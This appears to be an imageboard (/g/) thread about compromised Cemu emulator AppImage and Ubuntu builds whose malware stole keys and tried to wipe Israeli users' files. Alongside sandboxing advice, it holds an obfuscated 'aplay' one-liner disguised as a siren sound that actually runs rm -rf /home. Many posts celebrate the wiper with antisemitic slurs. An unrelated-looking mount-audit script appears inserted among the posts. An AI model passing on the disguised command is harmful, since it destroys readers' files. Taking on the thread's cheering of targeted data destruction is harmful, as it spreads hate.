>https://rentry.org/cemu-security-psa
>Cemu 2.6 AppImage and Ubuntu 22.04 builds from 6th May to 12th May are compromised
>>108810852>https://rentry.org/cemu-security-psa
>>108810859 >instantly falling for the Russian locale false flag
no wonder they got pwned
the 4 people who want to emulate Wii U and have an aversion to Flatpak are devastated
>If you are a Windows or MacOS user you are not affected
>>108810859 flatpakchads where we @? kinda getting tired of winning
bleeding edge retards have been quite silent since their PCs got RATted lmao
>>108811285 True! Imagine running apps non-sandboxed with access to everything. Cringe
>>108810859 >rm -rf / if you're israeli
Based
>>108810852THERE'S ANOTHER ONE!
>>108810859Kek Israelis getting ballistic missiles from Russia.Based. Tkd.
>>108810859 >if your locale is Russian then the malware does nothing
Holy based
>>108810852>Using Shitbuntu
>>108811404Based
>>108810859 Looking at how it works, it seems that, if I ever had to use that shit, it wouldn't ever affect my configuration, and I've been using said configuration for more than 20 years.
It's amazing how much shit you can prevent by protecting /tmp alone; all the other shit in /home can be fine-tuned with some minimal hardening applied situationally. For example, AppImages don't have sandboxing by default, but their intrinsic design makes them very easy to use with firejail (all the shit is already self-contained, so the profile writing is trivial).
Again, this shit is PEBKAC-tier malware, only affecting midwits, because retards will never go off the rails (software center) and positive-standard-deviation chads aren't that naive to run third-party shit without checking or taking adequate measures.
>>108810852fucking hell, installed it like 3 days ago to play xeno chronicles x
>>108810859Based. I will willingly install this virus now
How can an AppImage run rm -rf? I thought that needed su privilege?
>open sauce
>can't tell what it do?
Retards talk about how traditional repo-based package managers lead to heckin supply chain attacks but this is like the tenth time I've seen an appimage/flatpak that was pozzed.
>>108811404should have been ~
>>108812661updooters on suicide watch
>>108812770 It's not my fault, I used EmuDeck to install a few emulators. Still need to check which version was installed, maybe it's something a bit older, don't know. I'm far from a person that needs everything updated, still using older versions of Windows 11 and macOS.
>>108810852source-based distros don't have this problem
I'm just installing everything in a VM now that any third worlder can vibe code malware.
>>108812661>>108812789Fuck. Was that on the Steam Deck? You might be fine. I got the emu recently, but as a Flatpak.
>>108812687Good question. I mean it could delete shit in home. Or does this shit work with the already patched dirty frag together?
>>108812687It can't, appimages don't have any more privileges than the user executing it.
>>108811404>>108810859>>rm -rf / if you're israeliThis also happened with the MistralAI hack, same group maybe?
>>108811404Heroes.
>>108812532 >>108812737 >>108812879 This shit is scary. Even on Windows, I hated to install random-ass 3rd party apps. Everything can be compromised, but I tend to trust my distro's repo. But I know, even there can be fucking backdoors, like the XZ shit.
I'll try to minimize my Flatpak/AppImage use now.
>>108810859HOLY BASED EVERY JEW IN TEL AVIV ON LINUX IS A SPY
>>108810859 >pc graphics card died few days ago
>was using Linux Mint
>see this
I can't even check if I'm fucked or not. Pray for me and hold me bros.
>>108810887this lol. it's like they're in on it atp. some skid staged a backdoor on their shit to rat a discord opp or whatever and then quickly reported it to get the heat off themselves.
>>108810852>kike graffiting a synagoguenose status of the maintainers?
>>108813107 >But I know, even there can be fucking backdoors, like the XZ shit.
The XZ shit was due to systemd being such a standardized and humongous surface; what made old Linux virtually immune to vulnerabilities of that scale was its original fragmented nature. The more it gets standardized, the more you have concentrated efforts with a clearer cost/benefit from the POV of the attacker. If you want to keep a higher frame of security, use alt-Linux components (non-Red Hat tech, in short) as much as possible; also KISS, so you have an easier time isolating/swapping components.
>check GitHub issue
>The wiper doesn't even work
Are ruskies capable of doing anything right? What a bunch of losers.
>>108813170a false flag that works is a false flag that sucks.
>>108810852I downloaded Cemu on Lutris the other day for future use, but didn't run it. Better check on it in a bit.
>>108812737centralization = larger blast radius = more incentive to be attacked
>>108813183Isn't lutris basically the windows version? And yes, if you didn't start it, you should be fine.
>>108810852Oh no, another one: Fragnesia>https://github.com/v12-security/pocs/tree/main/fragnesia
>>108813231What the fuck is going on? Has there been a sudden surge in vulnerabilities and attacks or is this just a perception thing because I haven't been paying attention until now?
>>108813288Happens every time, Linux just gets more traction recently + it's open source and openly discussed, unlike other operating systems, where backdoors are given to 3 letter agencies first.And yes, priv escalation definitely gets moar traction.
>>108813231 >>108813288 >all executable scripts dropped in /tmp
>somehow this is concerning
Nigger, just mount /tmp with noexec. How is any of this even remotely an issue for properly configured systems?
>>108813288You are getting shilled at by Peter Thiel bots Pay it no mind, the only thing that can be gleaned from this thread is “homosexual kikes don’t want me to use Linux”
>>108810859>Russian hacker>rm -rf /IsraelBased
Nearly sharded and farded until I noticed that I used Cemu-AppImage-Enhanced which is out of date. Also, if I understand the issue discussion on github correctly, the malware only launches on application launch.
>>108810859Same as this one in case you didn't see it
>>108811404 Don't modern distros stop that with --no-preserve-root? Or are they just shortening the guard-rail command for anyone that knows what rm -rf / is? Either way BASED.
>>108812687It will just remove every file you have write access to
Gentoo wins again
>>108813302In this case that would help, but what's stopping them from placing the files somewhere in you /home or /dev/shm? noexec /tmp feels security-theater-ish to me
>>108813704 >In this case that would help, but what's stopping them from placing the files somewhere in your /home or /dev/shm?
Nothing can happen unless the user allows it. All these exploits rely on scripts that need to be executed somehow; a modicum of mandatory access control over the usual suspects, like web browsers and PDF readers, which all mainstream distros do by default, already prevents these passive potential occurrences. Anything else is RAT/Trojan tier of "vulnerability", so something that's not really a matter of OS-inherent security.
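An added example for the noexec back-and-forth above (this is not code from any post in the thread, the Cemu project, or the advisory): a POSIX shell audit that reads /proc/mounts-format lines and reports which of the usual user-writable mount points lack noexec, nosuid or nodev. The mount table embedded in the block is constructed, and the list of mount points in WRITABLE_MOUNTS is an assumption you should adjust to your layout.

```shell
#!/bin/sh
# Added example (not from the thread): audit which user-writable mount points
# are missing noexec/nosuid/nodev. Input is /proc/mounts-format lines on stdin,
# so it works on a captured table as well as the live system.

# Mount points an unprivileged process can usually write to (assumption).
WRITABLE_MOUNTS="/tmp /var/tmp /dev/shm /home"

# audit_mounts: for every wanted mount point on stdin, print
#   <mountpoint> missing=<opt1,opt2,...>
# and print nothing for mount points that already carry all three options.
audit_mounts() {
    awk -v want="$WRITABLE_MOUNTS" '
    BEGIN { n = split(want, w, " "); for (i = 1; i <= n; i++) wanted[w[i]] = 1 }
    {
        mp = $2; opts = "," $4 ","          # field 4 is the option list
        if (!(mp in wanted)) next
        missing = ""
        if (opts !~ /,noexec,/) missing = missing "noexec,"
        if (opts !~ /,nosuid,/) missing = missing "nosuid,"
        if (opts !~ /,nodev,/)  missing = missing "nodev,"
        if (missing != "") { sub(/,$/, "", missing); print mp " missing=" missing }
    }'
}

# Constructed sample table (not captured from any real host): /tmp is fully
# hardened, /dev/shm lacks noexec, /home has no hardening options at all.
SAMPLE_MOUNTS='tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
/dev/sda2 /home ext4 rw,relatime 0 0
/dev/sda1 / ext4 rw,relatime 0 0'

# Demo: first the constructed table, then the live system when available.
printf '%s\n' "$SAMPLE_MOUNTS" | audit_mounts
if [ -r /proc/mounts ]; then
    echo "--- live system ---"
    audit_mounts < /proc/mounts
fi
```

Two caveats that the replies above touch on: noexec only stops the kernel from execve-ing a file that lives on that filesystem, so `sh /tmp/dropper.sh` or `python3 /tmp/dropper.py` still runs; and a dropper that already runs as your user can write to $HOME, which is almost never mounted noexec because your own binaries and AppImages live there.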
>>108813655yeah, it's a false flag, if they were actually trying they would be looking for luks headers to nuke and overwriting filesystem superblocks
So basically there is the "Sovereign Tech Fund". They are an open organization. Germany has to fund some open source projects, so they just donate 3 million to the Sovereign Tech Fund and they decide which open source projects gets money.Last time GNOME received 1 million. And BSD 500k? And some other projects.
Who told me Linux is safe from viruses? wtf
>>108814063wrong reply, sorry.
>>108814066 This is the same tier of "virus" you may get on Windows if you download and run "bigtitties.exe" from warez.aids.ru. If that's the magnitude of the menace, just don't be retarded and you'll be fine regardless of the OS.
OK, so I need an SSD wipe and OS reinstall. Looks like fucking EmuDeck installed the compromised version a few days ago with a few other emulators, but I only used Cemu.
>>108814109this was snuck into a trusted emulator nigger
>>108815555 It was snuck into a third-party application specifically packaged as an AppImage. That's at least 2 steps made into the unknown, retard; you should ALWAYS check regardless.
>>108815808check what?
>>108815877 What the shit you download contains and does, you fucking spastic. firejail and bubblewrap are right there for sandboxing such stuff.
>>108810859kek
>>108812687 AppImages are no different than running an executable. A root delete will fail unless the user executed it with sudo. There's also --no-preserve-root as a check you must pass. As that other anon said, a root delete will simply delete everything you actually have permissions for.
(((Flatpak))) sandboxes the app in its own environment, but you should generally avoid Flatpaks. They're bad and bloated, and cut you off from system things you might need.
>>108813035Steam Deck has an immutable root filesystem. By definition, it's made so you can't do anything to the root, and if you actually modify it, it will restore it upon restart.
>>108813116BLOODY SPYYYYYYY!!!!!
>>108813133You're fine. You probably are missing some driver.
>>108813218Bears mentioning that the malware is setup to run only upon SECOND run of the emulator.
>>108813307>You are getting shilled at by Peter Thiel bots Good point.
>>108812789hmm so could this be an attack from retroarch? interesting
>>108815907you manually check every package you download and even after it updates?>firejail and bubblewrap are right theretwo questions: does it warn you of any stopped attempts? is there a nice UI for managing them? I've been meaning to give them a shot but remembering those long commands for every launch seems like such a hassle when I'm just trying to live my life
>>108812532 >>108813167 Containerization by itself can be a very good tool for security, but that's the wrong approach; you should use podman or systemd-nspawn with a hardened container. You're supposed to containerize systems, not applications.
>>108812737 It's malicious people saying that. A repo-based system with packages checked and validated by maintainers is the safest system of software distribution; its only problem is that there are not enough maintainers, and this is in part because the Linux ecosystem is fragmented.
AppImage/Flatpak are a Trojan horse for Linux, for making it adopt the app store model of mobile OSes, which is funny because that's the most insecure model of all, since it allows basically everyone to distribute with almost no checks. Same with language-level packages like PyPI or npm: an extremely unsafe and retarded idea, but aggressively pushed.
>>108813288There's hundreds of CVEs a month for Linux anon, this is nothing out of the ordinary except that some people are attention seeking posting pocs with cool names on github.
>>108816141>I've been meaning to give them a shot but remembering those long commands for every launch seems like such a hassle when I'm just trying to live my lifeJewdownloader was also attacked recently and I had to learn to use yt-dlp and gallery-dl commands. I feel much better using programs that I can see the source and don't auto update like a windows malware.
>>108815953what and that's supposed to make you immune to malware?
How many more examples like this is it going to take for /g/ to admit that closed source is safer.
>>108810859 here's the siren sound (volume warning)
aplay --rawaudio "`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"  # the backtick substitution decodes to, and runs, rm -rf /home before aplay ever starts; do not paste this
>>108816594Isn't GitHub owned by Microsoft? What's stopping them from injecting this in windows programs?
>>108810852Y-you don't understand! Loonix is much more secure than Windows, so malware can't possibly work... somehow...
>>108816599Cool command anon, the volume wasn't even that high.
>>108816141 >you manually check every package you download and even after it updates?
Third-party ones? Yes. I try to rely as much as possible on trusted sources (e.g. distro repos) to minimize this chore, but if I have to run anything third-party I do at least the minimum security procedures (md5 checksum and physically looking inside for shit that looks out of place).
>two questions: does it warn you of any stopped attempts?
Yes, they have verbose flags.
>is there a nice UI for managing them?
Firejail has firetools; I don't know about bubblewrap, but honestly they're so easy to use that GUIs are overkill in my opinion.
>I've been meaning to give them a shot but remembering those long commands for every launch seems like such a hassle when I'm just trying to live my life
With firejail you can write permanent profiles that get automatically checked by the executable. You can even avoid manually launching "firejail application" by making a symlink in .local/bin (or /usr/local/bin if you want it to be system-wide) to /usr/bin/firejail, named after the application you need to sandbox (example: you make a symlink named "firefox" in .local/bin, so every time you launch firefox it's automatically launched with firejail).
>>108816987>md5Did you wake up from a coma?>physically looking insideDownload the Cemu AppImage and do your usual checking routine. Let's see if you find it.
>>108817158I said minimal procedures just to be sure, everything else can be prevented by just using the fucking sandbox tools. Better giving a passive glance at the shit than just blindly execute it.
>>108810852>Ubuntu>AppimageGood. Sorry, not really, if you're retarded enough to use either of these then you deserve the malware and bullying coming your way.
>>108817243what's the point of these "minimal procedures" and "passive glances" when the sandbox tools apparently takes care of it?
>>108817301It's to keep your guard up, over reliance on something is always retarded.
>>108817353but these minimal glances don't actually ever catch anything substantial
>>108817553You may never know for sure, better safe than sorry.
>>108810852 I checked and it was the bad hash. I changed my password. Is there any way to check if I actually have any of the shit on my Steam Deck? Or do you need to run it twice for it to have effect?
>>108816594>being raped by code you can seevs>being raped by code you can't seeWhat's the difference?
>>108818495 What I mean is that I launched Splatoon directly from ES-DE and not the emulator Cemu. Am I still affected?
>>108812737 The real reason why it's less likely to happen with traditional package managers is that it takes a while before they put the package out. With AppImage and Flatpak you can put out the malicious package in hours (or with AppImage instantly). The longer it takes, the more likely people are going to notice something is fishy, and somebody will have reported the issue before the package has been released in the repo.
>>108818495>>108818580It requires you to have run Cemu to have any effect. As far as we know it just attempts an rm -rf on Israeli IPs in Russian roulette fashion. If you're emulating Splatoon via Cemu (even if launched through other launchers), that script ran on your computer.>From preliminary analysis it seems that mostly it is trying to spread itself rather than cause direct damage, it does that by stealing SSH keys, github tokens and a lot of other passwords or keys that they can then use to infect more packages or software releases.I highly recommend you change your passwords and SSH keys as well.https://github.com/cemu-project/Cemu/issues/1911
>>108819098Debian Stablechads... we won...
>>108815937 >(((Flatpak))) sandboxes the app in its own environment, but you should generally avoid flatpaks. They're bad and bloated, and cut you off from system things you might need.
NTA, but that's precisely what I use Flatpak for. I even have a dedicated partition (with nosuid and nodev) where I install them and have them generate their user files. They're a cheap, ready-to-go subsystem for third-party stuff I want to be secluded.
>>108810852using a program with all the dependencies baked in is what made windows so virus laden in the first place.
>>108810852>Windows users not affected>ISRAELI USERS GET THEIR DATA WIPEDHAHAHAHAHAHA based. If I had any Linux computers I would willingly download and spread this basedware.
>>108819684>I highly recommend you change your passwords and SSH keys as well.What, so you don't want Israelis to get their files nuked? This "malware" is actually more useful than 99% of other software in existence.
>>108817252What about something like duckstation that only has an appimage?
>>108820294 It's just a chain of trust; ANY software can be compromised. When some careless dev got malware + a token stealer, it's not Linux's fault.
>What about something like duckstation that only has an appimage?
Then you use the AppImage. Notepad++ on Windows got compromised, Cemu got compromised. Just try to stick to your distro's official repo, and if your desired software isn't available, go to the dev directly and use their distribution method.
It was just unlucky with Cemu; I doubt that anyone got harmed.
So what's the solution? I know not running the binary in the first place, but what other options do you have to minimize the damage? Use bubblewrap for all AppImages or binaries in general?
>>108820294 >>108821189
>install firejail on your distro
>run the appimage with it
>firejail --appimage ./Duckstation.AppImage
firejail has an extra --flag for AppImages. And if you use AppImage launchers like Gearlever, you can just edit your .desktop file in ~/.local/share/applications: right-click your .desktop file and add firejail --appimage in the Exec= field.
>>108821189 >use bubblewrap for all appimages or (third-party) binaries in general?
Yes. It's that simple. Bubblewrap and firejail are very powerful and retard-ready to use once you get the hang of them.
>>108821321Thank you senpai, this opened my eyes, I will try to be more careful now, but I have no idea how to do this. I think I'll look into firejail and learn the basics.It would be nice, if there was an App, that automatically runs AppImages in a sandbox and secures them, in a nice GUI.I don't have the mental capacity to learn that shit right now... but let's be real, this is still 100x better than running a fucking windows.exe with admin.
>>108821355 You're welcome, but, to give the devil his due, you can do the same on Windows using Sandboxie (or the system-integrated tool for sandboxing, which I don't know much about, but still).
>>108821440but sandboxie isn't persistent, right? :/
Just use the Lutris flatpak to launch Linux native games, the game will be confined to the flatpak permissions you give Lutris using Flatseal. You can even run appimages via Lutris.
>>108821544You can set it to be